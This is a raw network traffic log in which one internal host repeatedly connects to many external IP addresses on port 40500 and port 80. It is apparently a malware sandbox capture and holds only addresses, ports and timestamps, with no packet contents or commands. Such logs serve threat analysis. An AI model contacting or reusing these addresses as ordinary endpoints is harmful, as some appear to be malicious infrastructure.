                                            Sep 17, 2024 23:12:08.140755892 CEST4980840500192.168.2.4151.242.54.207
                                            Sep 17, 2024 23:12:08.143924952 CEST4980840500192.168.2.4151.242.54.207
                                            Sep 17, 2024 23:12:08.145648956 CEST4050049808151.242.54.207192.168.2.4
                                            Sep 17, 2024 23:12:08.189383984 CEST4050049808151.242.54.207192.168.2.4
                                            Sep 17, 2024 23:12:09.240498066 CEST4980980192.168.2.477.91.77.92
                                            Sep 17, 2024 23:12:09.245539904 CEST804980977.91.77.92192.168.2.4
                                            Sep 17, 2024 23:12:09.245800018 CEST4980980192.168.2.477.91.77.92
                                            Sep 17, 2024 23:12:09.245800018 CEST4980980192.168.2.477.91.77.92
                                            Sep 17, 2024 23:12:09.250590086 CEST804980977.91.77.92192.168.2.4
                                            Sep 17, 2024 23:12:09.414012909 CEST405004979882.200.224.194192.168.2.4
                                            Sep 17, 2024 23:12:09.417040110 CEST4979840500192.168.2.482.200.224.194
                                            Sep 17, 2024 23:12:10.900790930 CEST804980977.91.77.92192.168.2.4
                                            Sep 17, 2024 23:12:10.900881052 CEST4980980192.168.2.477.91.77.92
                                            Sep 17, 2024 23:12:10.900930882 CEST4980980192.168.2.477.91.77.92
                                            Sep 17, 2024 23:12:10.905935049 CEST804980977.91.77.92192.168.2.4
                                            Sep 17, 2024 23:12:12.937695980 CEST4981080192.168.2.477.91.77.92
                                            Sep 17, 2024 23:12:12.985651970 CEST804981077.91.77.92192.168.2.4
                                            Sep 17, 2024 23:12:12.985769033 CEST4981080192.168.2.477.91.77.92
                                            Sep 17, 2024 23:12:12.986103058 CEST4981080192.168.2.477.91.77.92
                                            Sep 17, 2024 23:12:13.040534019 CEST804981077.91.77.92192.168.2.4
                                            Sep 17, 2024 23:12:13.191797018 CEST4981140500192.168.2.45.235.246.49
                                            Sep 17, 2024 23:12:13.209384918 CEST40500498115.235.246.49192.168.2.4
                                            Sep 17, 2024 23:12:13.209495068 CEST4981140500192.168.2.45.235.246.49
                                            Sep 17, 2024 23:12:13.225720882 CEST4981140500192.168.2.45.235.246.49
                                            Sep 17, 2024 23:12:13.269351006 CEST4981140500192.168.2.45.235.246.49
                                            Sep 17, 2024 23:12:13.277179956 CEST40500498115.235.246.49192.168.2.4
                                            Sep 17, 2024 23:12:13.565782070 CEST4981140500192.168.2.45.235.246.49
                                            Sep 17, 2024 23:12:13.606034040 CEST40500498115.235.246.49192.168.2.4
                                            Sep 17, 2024 23:12:13.629051924 CEST40500498115.235.246.49192.168.2.4
                                            Sep 17, 2024 23:12:14.779342890 CEST804981077.91.77.92192.168.2.4
                                            Sep 17, 2024 23:12:14.779580116 CEST4981080192.168.2.477.91.77.92
                                            Sep 17, 2024 23:12:14.779664993 CEST4981080192.168.2.477.91.77.92
                                            Sep 17, 2024 23:12:14.801037073 CEST804981077.91.77.92192.168.2.4
                                            Sep 17, 2024 23:12:16.802189112 CEST4981280192.168.2.477.91.77.92
                                            Sep 17, 2024 23:12:16.809103012 CEST804981277.91.77.92192.168.2.4
                                            Sep 17, 2024 23:12:16.809173107 CEST4981280192.168.2.477.91.77.92
                                            Sep 17, 2024 23:12:16.809278011 CEST4981280192.168.2.477.91.77.92
                                            Sep 17, 2024 23:12:16.821739912 CEST804981277.91.77.92192.168.2.4
                                            Sep 17, 2024 23:12:18.285341978 CEST4981340500192.168.2.4109.200.174.222
                                            Sep 17, 2024 23:12:18.292438984 CEST4050049813109.200.174.222192.168.2.4
                                            Sep 17, 2024 23:12:18.292565107 CEST4981340500192.168.2.4109.200.174.222
                                            Sep 17, 2024 23:12:18.293869972 CEST4981340500192.168.2.4109.200.174.222
                                            Sep 17, 2024 23:12:18.298926115 CEST4050049813109.200.174.222192.168.2.4
                                            Sep 17, 2024 23:12:18.298995972 CEST4981340500192.168.2.4109.200.174.222
                                            Sep 17, 2024 23:12:18.300685883 CEST4981340500192.168.2.4109.200.174.222
                                            Sep 17, 2024 23:12:18.303879976 CEST4050049813109.200.174.222192.168.2.4
                                            Sep 17, 2024 23:12:18.354024887 CEST4050049813109.200.174.222192.168.2.4
                                            Sep 17, 2024 23:12:18.493155003 CEST804981277.91.77.92192.168.2.4
                                            Sep 17, 2024 23:12:18.495368004 CEST4981280192.168.2.477.91.77.92
                                            Sep 17, 2024 23:12:18.495574951 CEST4981280192.168.2.477.91.77.92
                                            Sep 17, 2024 23:12:18.878278971 CEST4981280192.168.2.477.91.77.92
                                            Sep 17, 2024 23:12:18.913873911 CEST804981277.91.77.92192.168.2.4
                                            Sep 17, 2024 23:12:18.915170908 CEST4981280192.168.2.477.91.77.92
                                            Sep 17, 2024 23:12:19.199734926 CEST804981277.91.77.92192.168.2.4
                                            Sep 17, 2024 23:12:19.199783087 CEST804981277.91.77.92192.168.2.4
                                            Sep 17, 2024 23:12:19.199888945 CEST4981280192.168.2.477.91.77.92
                                            Sep 17, 2024 23:12:19.661302090 CEST40500498042.183.100.16192.168.2.4
                                            Sep 17, 2024 23:12:19.661535025 CEST4980440500192.168.2.42.183.100.16
                                            Sep 17, 2024 23:12:20.520932913 CEST4981480192.168.2.477.91.77.92
                                            Sep 17, 2024 23:12:20.526204109 CEST804981477.91.77.92192.168.2.4
                                            Sep 17, 2024 23:12:20.527004957 CEST4981480192.168.2.477.91.77.92
                                            Sep 17, 2024 23:12:20.527097940 CEST4981480192.168.2.477.91.77.92
                                            Sep 17, 2024 23:12:20.532430887 CEST804981477.91.77.92192.168.2.4
                                            Sep 17, 2024 23:12:22.405818939 CEST804981477.91.77.92192.168.2.4
                                            Sep 17, 2024 23:12:22.405915976 CEST4981480192.168.2.477.91.77.92
                                            Sep 17, 2024 23:12:22.406094074 CEST4981480192.168.2.477.91.77.92
                                            Sep 17, 2024 23:12:22.414688110 CEST804981477.91.77.92192.168.2.4
                                            Sep 17, 2024 23:12:23.316504955 CEST4981540500192.168.2.4213.230.126.39
                                            Sep 17, 2024 23:12:23.322115898 CEST4050049815213.230.126.39192.168.2.4
                                            Sep 17, 2024 23:12:23.322212934 CEST4981540500192.168.2.4213.230.126.39
                                            Sep 17, 2024 23:12:23.323297977 CEST4981540500192.168.2.4213.230.126.39
                                            Sep 17, 2024 23:12:23.328326941 CEST4050049815213.230.126.39192.168.2.4
                                            Sep 17, 2024 23:12:23.328397989 CEST4981540500192.168.2.4213.230.126.39
                                            Sep 17, 2024 23:12:23.331442118 CEST4981540500192.168.2.4213.230.126.39
                                            Sep 17, 2024 23:12:23.333739996 CEST4050049815213.230.126.39192.168.2.4
                                            Sep 17, 2024 23:12:23.377593994 CEST4050049815213.230.126.39192.168.2.4
                                            Sep 17, 2024 23:12:24.458720922 CEST40500498065.232.149.197192.168.2.4
                                            Sep 17, 2024 23:12:24.458786011 CEST4980640500192.168.2.45.232.149.197
                                            Sep 17, 2024 23:12:25.444511890 CEST4981680192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:25.451554060 CEST804981691.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:25.451675892 CEST4981680192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:25.451838017 CEST4981680192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:25.457576036 CEST804981691.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:26.509773016 CEST804981691.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:26.509943962 CEST804981691.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:26.509984970 CEST804981691.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:26.510019064 CEST804981691.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:26.510035038 CEST4981680192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:26.510072947 CEST804981691.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:26.510107994 CEST804981691.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:26.510123014 CEST4981680192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:26.510123014 CEST4981680192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:26.510123014 CEST4981680192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:26.510144949 CEST804981691.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:26.510154009 CEST4981680192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:26.510179996 CEST804981691.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:26.510200977 CEST4981680192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:26.510231972 CEST4981680192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:26.510664940 CEST4981680192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:26.510704994 CEST4981680192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:26.510905027 CEST804981691.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:26.510940075 CEST804981691.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:26.510977030 CEST4981680192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:26.511010885 CEST4981680192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:26.511456013 CEST804981691.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:26.511990070 CEST804981691.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:26.512044907 CEST4981680192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:26.512592077 CEST4981680192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:26.522176027 CEST804981691.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:26.522250891 CEST4981680192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:27.527102947 CEST4981780192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:28.070878029 CEST804981791.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:28.071275949 CEST4981780192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:28.071275949 CEST4981780192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:28.077002048 CEST804981791.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:28.347719908 CEST4981840500192.168.2.4194.93.26.70
                                            Sep 17, 2024 23:12:28.370312929 CEST4050049818194.93.26.70192.168.2.4
                                            Sep 17, 2024 23:12:28.370408058 CEST4981840500192.168.2.4194.93.26.70
                                            Sep 17, 2024 23:12:28.371566057 CEST4981840500192.168.2.4194.93.26.70
                                            Sep 17, 2024 23:12:28.378308058 CEST4981840500192.168.2.4194.93.26.70
                                            Sep 17, 2024 23:12:28.390610933 CEST4050049818194.93.26.70192.168.2.4
                                            Sep 17, 2024 23:12:28.440141916 CEST4050049818194.93.26.70192.168.2.4
                                            Sep 17, 2024 23:12:28.782985926 CEST8049803185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:12:28.783216953 CEST4980380192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:12:28.823597908 CEST804981791.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:28.823653936 CEST804981791.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:28.823663950 CEST4981780192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:28.823693037 CEST4981780192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:28.823692083 CEST804981791.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:28.823726892 CEST804981791.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:28.823734045 CEST4981780192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:28.823759079 CEST804981791.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:28.823761940 CEST4981780192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:28.823796034 CEST804981791.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:28.823800087 CEST4981780192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:28.823827982 CEST804981791.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:28.823837042 CEST4981780192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:28.823865891 CEST4981780192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:28.823868990 CEST804981791.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:28.823905945 CEST4981780192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:28.823914051 CEST804981791.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:28.823950052 CEST804981791.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:28.823957920 CEST4981780192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:28.823986053 CEST4981780192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:28.829000950 CEST804981791.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:28.829052925 CEST4981780192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:29.554887056 CEST4050049808151.242.54.207192.168.2.4
                                            Sep 17, 2024 23:12:29.556041956 CEST4980840500192.168.2.4151.242.54.207
                                            Sep 17, 2024 23:12:33.400969982 CEST4981940500192.168.2.491.246.92.22
                                            Sep 17, 2024 23:12:33.406198978 CEST405004981991.246.92.22192.168.2.4
                                            Sep 17, 2024 23:12:33.406287909 CEST4981940500192.168.2.491.246.92.22
                                            Sep 17, 2024 23:12:33.419585943 CEST4981940500192.168.2.491.246.92.22
                                            Sep 17, 2024 23:12:33.424668074 CEST405004981991.246.92.22192.168.2.4
                                            Sep 17, 2024 23:12:33.424750090 CEST4981940500192.168.2.491.246.92.22
                                            Sep 17, 2024 23:12:33.429759979 CEST405004981991.246.92.22192.168.2.4
                                            Sep 17, 2024 23:12:33.446604967 CEST4981940500192.168.2.491.246.92.22
                                            Sep 17, 2024 23:12:33.493465900 CEST405004981991.246.92.22192.168.2.4
                                            Sep 17, 2024 23:12:34.912028074 CEST4981780192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:34.912336111 CEST4982080192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:35.281239986 CEST40500498115.235.246.49192.168.2.4
                                            Sep 17, 2024 23:12:35.281698942 CEST40500498115.235.246.49192.168.2.4
                                            Sep 17, 2024 23:12:35.281900883 CEST40500498115.235.246.49192.168.2.4
                                            Sep 17, 2024 23:12:35.282010078 CEST4981140500192.168.2.45.235.246.49
                                            Sep 17, 2024 23:12:35.282010078 CEST4981140500192.168.2.45.235.246.49
                                            Sep 17, 2024 23:12:35.284437895 CEST804982091.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:35.284482002 CEST4981140500192.168.2.45.235.246.49
                                            Sep 17, 2024 23:12:35.284488916 CEST804981791.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:35.284538031 CEST4982080192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:35.284563065 CEST4981780192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:35.284993887 CEST4982080192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:35.288481951 CEST40500498115.235.246.49192.168.2.4
                                            Sep 17, 2024 23:12:35.290528059 CEST40500498115.235.246.49192.168.2.4
                                            Sep 17, 2024 23:12:35.290554047 CEST804982091.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:35.986341000 CEST804982091.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:35.986388922 CEST804982091.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:35.986409903 CEST804982091.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:35.986664057 CEST804982091.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:35.986689091 CEST804982091.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:35.986706018 CEST804982091.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:35.986722946 CEST804982091.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:35.986821890 CEST4982080192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:35.986821890 CEST4982080192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:35.986821890 CEST4982080192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:35.988200903 CEST4982080192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:35.988267899 CEST4982080192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:38.023427010 CEST4982180192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:38.028389931 CEST804982191.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:38.028450966 CEST4982180192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:38.028651953 CEST4982180192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:38.033406973 CEST804982191.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:38.443094015 CEST4982240500192.168.2.479.170.184.222
                                            Sep 17, 2024 23:12:38.448179007 CEST405004982279.170.184.222192.168.2.4
                                            Sep 17, 2024 23:12:38.449022055 CEST4982240500192.168.2.479.170.184.222
                                            Sep 17, 2024 23:12:38.450015068 CEST4982240500192.168.2.479.170.184.222
                                            Sep 17, 2024 23:12:38.455420971 CEST405004982279.170.184.222192.168.2.4
                                            Sep 17, 2024 23:12:38.455485106 CEST4982240500192.168.2.479.170.184.222
                                            Sep 17, 2024 23:12:38.456450939 CEST4982240500192.168.2.479.170.184.222
                                            Sep 17, 2024 23:12:38.461096048 CEST405004982279.170.184.222192.168.2.4
                                            Sep 17, 2024 23:12:38.509538889 CEST405004982279.170.184.222192.168.2.4
                                            Sep 17, 2024 23:12:38.728172064 CEST804982191.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:38.729098082 CEST4982180192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:39.727009058 CEST4050049813109.200.174.222192.168.2.4
                                            Sep 17, 2024 23:12:39.727222919 CEST4981340500192.168.2.4109.200.174.222
                                            Sep 17, 2024 23:12:40.755122900 CEST4982180192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:40.755361080 CEST4982380192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:40.760368109 CEST804982191.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:40.760441065 CEST4982180192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:40.760557890 CEST804982391.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:40.760632992 CEST4982380192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:40.760751009 CEST4982380192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:40.766241074 CEST804982391.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:41.466754913 CEST804982391.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:41.467262030 CEST4982380192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:43.472879887 CEST4982440500192.168.2.495.59.118.94
                                            Sep 17, 2024 23:12:43.489656925 CEST4982380192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:43.489867926 CEST4982580192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:43.831474066 CEST4982380192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:44.085017920 CEST405004982495.59.118.94192.168.2.4
                                            Sep 17, 2024 23:12:44.085028887 CEST804982591.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:44.085040092 CEST804982391.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:44.085247040 CEST4982440500192.168.2.495.59.118.94
                                            Sep 17, 2024 23:12:44.085854053 CEST4982580192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:44.085854053 CEST4982580192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:44.085875988 CEST804982391.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:44.085949898 CEST4982380192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:44.088418961 CEST4982440500192.168.2.495.59.118.94
                                            Sep 17, 2024 23:12:44.090631008 CEST804982591.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:44.093488932 CEST405004982495.59.118.94192.168.2.4
                                            Sep 17, 2024 23:12:44.093560934 CEST4982440500192.168.2.495.59.118.94
                                            Sep 17, 2024 23:12:44.097110033 CEST4982440500192.168.2.495.59.118.94
                                            Sep 17, 2024 23:12:44.098409891 CEST405004982495.59.118.94192.168.2.4
                                            Sep 17, 2024 23:12:44.145685911 CEST405004982495.59.118.94192.168.2.4
                                            Sep 17, 2024 23:12:44.680017948 CEST4050049815213.230.126.39192.168.2.4
                                            Sep 17, 2024 23:12:44.680084944 CEST4981540500192.168.2.4213.230.126.39
                                            Sep 17, 2024 23:12:44.777846098 CEST804982591.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:44.777939081 CEST4982580192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:46.801721096 CEST4982580192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:46.801991940 CEST4982680192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:46.807009935 CEST804982691.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:46.807121992 CEST4982680192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:46.807213068 CEST4982680192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:46.807260036 CEST804982591.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:46.807306051 CEST4982580192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:46.812207937 CEST804982691.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:47.533663988 CEST804982691.202.233.141192.168.2.4
                                            Sep 17, 2024 23:12:47.533844948 CEST4982680192.168.2.491.202.233.141
                                            Sep 17, 2024 23:12:49.113404036 CEST4982740500192.168.2.42.176.184.81
                                            Sep 17, 2024 23:12:49.118777990 CEST40500498272.176.184.81192.168.2.4
                                            Sep 17, 2024 23:12:49.119450092 CEST4982740500192.168.2.42.176.184.81
                                            Sep 17, 2024 23:12:49.120564938 CEST4982740500192.168.2.42.176.184.81
                                            Sep 17, 2024 23:12:49.125507116 CEST40500498272.176.184.81192.168.2.4
                                            Sep 17, 2024 23:12:49.127433062 CEST4982740500192.168.2.42.176.184.81
                                            Sep 17, 2024 23:12:49.128313065 CEST4982740500192.168.2.42.176.184.81
                                            Sep 17, 2024 23:12:49.132262945 CEST40500498272.176.184.81192.168.2.4
                                            Sep 17, 2024 23:12:49.173525095 CEST40500498272.176.184.81192.168.2.4
                                            Sep 17, 2024 23:12:49.762367964 CEST4050049818194.93.26.70192.168.2.4
                                            Sep 17, 2024 23:12:49.762428045 CEST4981840500192.168.2.4194.93.26.70
                                            Sep 17, 2024 23:12:50.678517103 CEST4980380192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:12:50.678832054 CEST4982880192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:12:50.683809042 CEST8049803185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:12:50.683836937 CEST8049828185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:12:50.683896065 CEST4982880192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:12:50.684051037 CEST4982880192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:12:50.689387083 CEST8049828185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:12:51.008256912 CEST40500498272.176.184.81192.168.2.4
                                            Sep 17, 2024 23:12:51.008348942 CEST4982740500192.168.2.42.176.184.81
                                            Sep 17, 2024 23:12:51.404925108 CEST8049828185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:12:51.407500982 CEST4982880192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:12:53.427396059 CEST4982880192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:12:53.427757025 CEST4982980192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:12:53.434288025 CEST8049828185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:12:53.434379101 CEST4982880192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:12:53.434393883 CEST8049829185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:12:53.434468031 CEST4982980192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:12:53.434623957 CEST4982980192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:12:53.440577984 CEST8049829185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:12:54.129080057 CEST4983040500192.168.2.45.233.220.4
                                            Sep 17, 2024 23:12:54.134042025 CEST40500498305.233.220.4192.168.2.4
                                            Sep 17, 2024 23:12:54.135077000 CEST4983040500192.168.2.45.233.220.4
                                            Sep 17, 2024 23:12:54.136496067 CEST4983040500192.168.2.45.233.220.4
                                            Sep 17, 2024 23:12:54.141452074 CEST40500498305.233.220.4192.168.2.4
                                            Sep 17, 2024 23:12:54.143565893 CEST4983040500192.168.2.45.233.220.4
                                            Sep 17, 2024 23:12:54.144021034 CEST4983040500192.168.2.45.233.220.4
                                            Sep 17, 2024 23:12:54.148442030 CEST40500498305.233.220.4192.168.2.4
                                            Sep 17, 2024 23:12:54.150146008 CEST8049829185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:12:54.150335073 CEST4982980192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:12:54.193593979 CEST40500498305.233.220.4192.168.2.4
                                            Sep 17, 2024 23:12:54.811352015 CEST405004981991.246.92.22192.168.2.4
                                            Sep 17, 2024 23:12:54.815378904 CEST4981940500192.168.2.491.246.92.22
                                            Sep 17, 2024 23:12:56.176781893 CEST4982980192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:12:56.177052975 CEST4983180192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:12:56.182873011 CEST8049831185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:12:56.182955027 CEST4983180192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:12:56.183052063 CEST4983180192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:12:56.183196068 CEST8049829185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:12:56.183355093 CEST4982980192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:12:56.188163996 CEST8049831185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:12:56.870342970 CEST8049831185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:12:56.871464968 CEST4983180192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:12:58.896806955 CEST4983180192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:12:58.897732973 CEST4983280192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:12:58.902276039 CEST8049831185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:12:58.902997971 CEST8049832185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:12:58.903134108 CEST4983180192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:12:58.903194904 CEST4983280192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:12:58.903496981 CEST4983280192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:12:58.908679008 CEST8049832185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:12:59.161263943 CEST4983340500192.168.2.45.190.248.13
                                            Sep 17, 2024 23:12:59.166320086 CEST40500498335.190.248.13192.168.2.4
                                            Sep 17, 2024 23:12:59.166397095 CEST4983340500192.168.2.45.190.248.13
                                            Sep 17, 2024 23:12:59.170533895 CEST4983340500192.168.2.45.190.248.13
                                            Sep 17, 2024 23:12:59.175407887 CEST40500498335.190.248.13192.168.2.4
                                            Sep 17, 2024 23:12:59.175468922 CEST4983340500192.168.2.45.190.248.13
                                            Sep 17, 2024 23:12:59.221374989 CEST40500498335.190.248.13192.168.2.4
                                            Sep 17, 2024 23:12:59.606447935 CEST8049832185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:12:59.607089996 CEST4983280192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:12:59.827030897 CEST405004982279.170.184.222192.168.2.4
                                            Sep 17, 2024 23:12:59.827104092 CEST4982240500192.168.2.479.170.184.222
                                            Sep 17, 2024 23:13:01.631660938 CEST4983280192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:13:01.632065058 CEST4983480192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:13:01.637567997 CEST8049834185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:13:01.637590885 CEST8049832185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:13:01.637631893 CEST4983480192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:13:01.637656927 CEST4983280192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:13:01.637963057 CEST4983480192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:13:01.642982006 CEST8049834185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:13:02.354104042 CEST8049834185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:13:02.354191065 CEST4983480192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:13:03.240053892 CEST4982680192.168.2.491.202.233.141
                                            Sep 17, 2024 23:13:03.240309000 CEST4983480192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:13:03.251307964 CEST804982691.202.233.141192.168.2.4
                                            Sep 17, 2024 23:13:03.251355886 CEST4982680192.168.2.491.202.233.141
                                            Sep 17, 2024 23:13:03.251451015 CEST8049834185.215.113.66192.168.2.4
                                            Sep 17, 2024 23:13:03.251488924 CEST4983480192.168.2.4185.215.113.66
                                            Sep 17, 2024 23:13:04.191715956 CEST4983540500192.168.2.4151.234.69.79
                                            Sep 17, 2024 23:13:04.196665049 CEST4050049835151.234.69.79192.168.2.4
                                            Sep 17, 2024 23:13:04.196748018 CEST4983540500192.168.2.4151.234.69.79
                                            Sep 17, 2024 23:13:04.197988987 CEST4983540500192.168.2.4151.234.69.79
                                            Sep 17, 2024 23:13:04.203119993 CEST4050049835151.234.69.79192.168.2.4
                                            Sep 17, 2024 23:13:04.203176022 CEST4983540500192.168.2.4151.234.69.79
                                            Sep 17, 2024 23:13:04.206500053 CEST4983540500192.168.2.4151.234.69.79
                                            Sep 17, 2024 23:13:04.208120108 CEST4050049835151.234.69.79192.168.2.4
                                            Sep 17, 2024 23:13:04.253458977 CEST4050049835151.234.69.79192.168.2.4
